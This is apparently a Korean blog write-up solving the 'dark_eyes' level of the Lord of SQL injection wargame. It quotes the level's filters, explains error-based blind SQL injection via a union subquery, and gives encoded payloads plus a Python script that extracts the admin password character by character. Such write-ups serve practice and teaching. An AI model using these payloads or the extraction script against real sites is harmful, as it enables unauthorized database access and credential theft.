소스코드 분석
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
전에 풀었던 문제랑 상당히 흡사하다. col, if, case, when 필터링이 추가되었다.
if(mysql_error()) exit();
echo "<hr>query : <strong>{$query}</strong><hr><br>";
그리고 mysql error가 뜨면 error 내용을 보여주지않는다.
?pw=%27%20or%20(id=%27admin%27%20and(select%20length(pw)=8%20union%20select%201))%23
- length(pw)가 참일 경우 -
(union 함수는 union Distinct와 동일한 작업을 하기 때문에 중복되는 값을 제거 한다.)
- length(pw)가 거짓일 경우 -
거짓일 경우 error가 발생하여 빈페이지로 넘어간다.
ERROR 1242 (21000): Subquery returns more than 1 row
?pw=%27%20or%20(id=%27admin%27%20and(select%20length(mid(pw,1,1))=1%20union%20select%201))%23
import http.client
result=''
leng=0
header={'Cookie':' '}
string="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"
for i in range(1,100) :
length='/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20length(pw)='+str(i)+'%20union%20select%201))%23'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',length,'',header)
data=conn.getresponse().read()
if "query" in data.decode():
leng = i
print ("pw length: "+str(i))
break
for i in range(1,leng+1):
for j in range(0,76):
substr = '/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php?pw=%27%20or%20(id=%27admin%27%20and(select%20substr(pw,'+str(i)+',1)=%27'+string[j]+'%27%20union%20select%201))%23'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',substr,'',header)
data=conn.getresponse().read()
if "query" in data.decode():
result=result+string[j]
print ('substr(pw,'+str(i)+',1)= '+str(string[j]))
break
print ('Password is '+result)
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] evil_wizard (0) | 2017.06.02 |
|---|---|
| [Lord of SQL injection] hell_fire (0) | 2017.06.02 |
| [Lord of SQL injection] iron_golem (0) | 2017.06.02 |
| [Lord of SQL injection] dragon (0) | 2017.06.01 |
| [Lord of SQL injection] xavis (0) | 2017.06.01 |
